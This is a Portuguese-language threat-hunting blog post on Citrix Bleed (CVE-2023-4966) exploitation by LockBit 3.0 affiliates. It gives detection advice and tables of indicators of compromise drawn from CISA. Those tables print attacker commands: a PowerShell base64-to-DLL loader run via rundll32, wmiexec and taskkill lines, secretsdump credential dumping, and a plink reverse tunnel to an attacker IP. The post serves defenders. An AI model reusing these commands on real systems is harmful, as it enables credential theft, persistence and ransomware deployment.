Hunting CVE 2023-4966 IOCs

O CVE-2023-4966, conhecido como “Citrix Bleed“, é uma vulnerabilidade crítica de divulgação de informações no Citrix NetScaler Application Delivery Controller (ADC) e no NetScaler Gateway.

Citrix Bleed e LockBit 3.0

O Citrix Bleed é conhecido por ser explorado pelas afiliadas do LockBit 3.0, historicamente, as afiliadas do LockBit 3.0 conduziram ataques contra organizações de tamanhos variados em vários setores de infraestrutura crítica, incluindo educação, energia, serviços financeiros, alimentos e agricultura, serviços governamentais e de emergência, saúde, manufatura e transporte.

Hunting

Priorizar a observação dos usuários em sessão ao procurar anomalias na rede. Isso ajuda na busca por atividades suspeitas, como instalação de ferramentas no sistema (por exemplo, putty, rClone), criação de novas contas, logs de falha ou execução de comandos como hostname, quser, whoami, net e taskkill.

Para endereços IP:

  • Identifique se o NetScaler registra a alteração no IP.
  • Identifique se os usuários estão fazendo login em locais geográficos incomuns para a base de usuários da sua organização.
  • Ao registrar a autenticação VPN, identifique se os usuários estão associados a dois ou mais endereços IP públicos enquanto estão em uma sub-rede diferente ou geograficamente dispersos.

Nota: A MFA para NetScaler não funcionará conforme planejado porque o invasor ignora a autenticação fornecendo um token/sessão para um usuário já autenticado.

Os procedimentos a seguir podem ajudar a identificar a exploração potencial da atividade CVE-2023-4966 e LockBit 3.0:

  • Pesquise nomes de arquivos que contenham tf0gYx2YI para identificar arquivos criptografados LockBit.
  • Atores do LockBit 3.0 geralmente usam C:\Temp para download, e execução de arquivos.
  • Investigue solicitações para o endpoint HTTP/S do WAF.
  • Procure padrões de login suspeitos nos logs do NetScaler
  • Procure chaves de registro do Windows suspeitas do agente de desktop virtual
  • Analise arquivos de dump principal de memória.

Indicadores de Comprometimento (IOCs)

O site oficial da Cybersecurity and Infrastructure Security Agency (CISA), uma agência federal dos Estados Unidos publicou um relatório completo sobre o tema e deixou disponibilizado os IOCs normalmente explorados pelos afiliados.

Regras YARA

Neste repositório, você encontrará 4 regras YARA distintas, cada uma projetada para identificar diferentes aspectos e variantes do ransomware Lockbit descrita no documentos oficial do CISA.

https://github.com/danieldonda/YARA_RULES/tree/main

LOLBINS

O malware identificado nesta campanha é gerado começando com a execução de um script PowerShell (123.ps1) que concatena duas strings base64, converte-as em bytes e grava-as no caminho de arquivo designado.

$y = “TVqQAAMA…<string longa base64>”
$x = “RyEHABFQ…<string longa base64>”
$filePath = “C:\Usuários\Público\adobelib.dll” $fileBytes = [System.Convert]::FromBase64String($y + $x)
[System.IO.File]::WriteAllBytes($filePath, $fileBytes)

O arquivo resultante (adobelib.dll) é então executado pelo script do PowerShell usando rundll32. rundll32 C:\Users\Public\adobelib.dll,main <chave hexadecimal 104>

IOCs

IndicatorTypeFidelityDescription
192.229.221[.]95IPLowMag.dll calls out to this IP address. Ties back to dns0.org. Should run this DLL in a sandbox, when possible, to confirm C2. IP is shared hosting.
123.ps1PowerShell scriptHighCreates and executes payload via script.
193.201.9[.]224IPHighFTP to Russian geolocated IP from compromised system.
62.233.50[.]25IPHighRussian geolocated IP from compromised system. Hxxp://62.233.50[.]25/en-us/docs.html Hxxp://62.233.50[.]25/en-us/test.html
51.91.79[.].17IPMedTemp.sh IP.
TeamviewerTool (Remote Admin)Low 
70.37.82[.]20IPLowIP was seen from a known compromised account reaching out to an Altera IP address. LockBit is known to leverage Altera, a remote admin tool, such as Anydesk, team viewer, etc.
185.17.40[.]178IPLowTeamviewer C2, ties back to a polish service provider, Artnet Sp. Zo.o. Polish IP address.
IndicatorTypeFidelityDescription
185.229.191.41Anydesk UsageHighAnydesk C2.
81.19.135[.]219IPHighRussian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta Hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta
45.129.137[.]233IPMediumCallouts from known compromised device beginning during the compromised window.
185.229.191[.]41Anydesk UsageHighAnydesk C2.
Plink.exeCommand interpreterHighPlink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows.
AnyDeskMSI.exeRemote admin toolHighWe do see that AnyDeskMSI.exe was installed as a service with “auto start” abilities for persistence. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently.
SRUtility.exeSplashtop utility 9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a
Netscan exeNetwork scanning softwareHigh498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155
IndicatorTypeFidelityDescription
Scheduled task: \MEGA\MEGAcmdPersistence  High 
Scheduled task: UpdateAdobeTaskPersistenceHigh 
Mag.dllPersistenceHighIdentified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63.
123.ps1ScriptHighCreates rundll32 C:\Users\Public\adobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44.
Adobelib.dllPersistenceLowC2 from adobelib.dll.
Adobe-us-updatefiles[.]digitalTool DownloadHighUsed to download obfuscated toolsets.
172.67.129[.]176Tool DownloadHighIP of adobe-us-updatefiles[.]digital.
104.21.1[.]180Tool DownloadHighAdobe-us-updatefiles[.]digital.
cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1CommandHighwmiexec.exe usage
cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1CommandHighwmiexec.exe usage
cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1CommandHighwmiexec.exe usage
cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlexCommandHighwmiexec.exe usage
cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1CommandHighwmiexec.exe usage

IndicatorTypeFidelityDescriptionNotes
81.19.135[.]219IPHighRussian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7.hta 
81.19.135[.]220IPHighRussian geolocated IP, seen outbound in logsIP registered to a South African Company
81.19.135[.]226IPHighRussian geolocated IP, seen outbound in logsIP registered to a South African Company
TypeIndicatorDescription
Filenamec:\users\<username>\downloads\process hacker 2\peview.exeProcess hacker
Filenamec:\users\<username>\music\process hacker 2\processhacker.exeProcess hacker
Filenamepsexesvc.exePsexec service excutable
Filenamec:\perflogs\processhacker.exeProcess hacker
Filenamec:\windows\temp\screenconnect\23.8.5.8707\files\processhacker.exeProcess hacker transferred via screenconnect
Filenamec:\perflogs\lsass.dmpLsass dump
Filenamec:\users\<username>\downloads\mimikatz.exeMimikatz
Filenamec:\users\<username>\desktop\proc64\proc.exeProcdump
Filenamec:\users\<username>\documents\veeam-get-creds.ps1Decrypt veeam creds
Filenamesecretsdump.pyImpacket installed on azure vm
Cmdlinesecretsdump.py <domain>/<username>@<ip> -outputfile 1Impacket installed on azure vm
Filenamead.ps1Adrecon found in powershell transcripts
Filenamec:\perflogs\64-bit\netscan.exeSoftperfect netscan
Filenametniwinagent.exeTotal network inventory agent
Filenamepsexec.exePsexec used to deploy screenconnect
Filename7z.exeUsed to compress files
ToolAction1RMM
ToolAteraRMM
toolanydeskrmm
toolfixme itrmm
toolscreenconnectrmm
toolsplashtoprmm
toolzoho assistrmm
ipv4101.97.36[.]61zoho assist
ipv4168.100.9[.]137ssh portforwarding infra
ipv4185.20.209[.]127zoho assist
ipv4185.230.212[.]83zoho assist
ipv4206.188.197[.]22powershell reverse shell seen in powershell logging
ipv454.84.248[.]205fixme ip
Ipv4141.98.9[.]137Remote IP for CitrixBleed
domainassist.zoho.euzoho assist
filenamec:\perflogs\1.execonnectwise renamed
filenamec:\perflogs\run.exescreenconnect pushed by psexec
filenamec:\perflogs\64-bit\m.execonnectwise renamed
filenamec:\perflogs\64-bit\m0.execonnectwise renamed
filenamec:\perflogs\za_access_my_department.exezoho remote assist
filenamec:\users\<username>\music\za_access_my_department.exezoho remote assist
filenamec:\windows\servicehost.exeplink renamed
filenamec:\windows\sysconf.batruns servicehost.exe (plink) command
filenamec:\windows\temp\screenconnect\23.8.5.8707\files\azure.msizoho remote assist used to transfer data via screenconnect
cmdlineecho enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9[.]137 -pw <password>plink port forwarding
domaineu1-dms.zoho[.]euzoho assist
domainfixme[.]itfixme it
domainunattended.techinline[.]netfixme it

Referências

Anúncio

About Daniel Donda 550 Articles
Olá, meu nome é Daniel Donda e sou especialista em cibersegurança, autor de livros, professor e palestrante. Saiba mais

Be the first to comment

Leave a Reply

Your email address will not be published.


*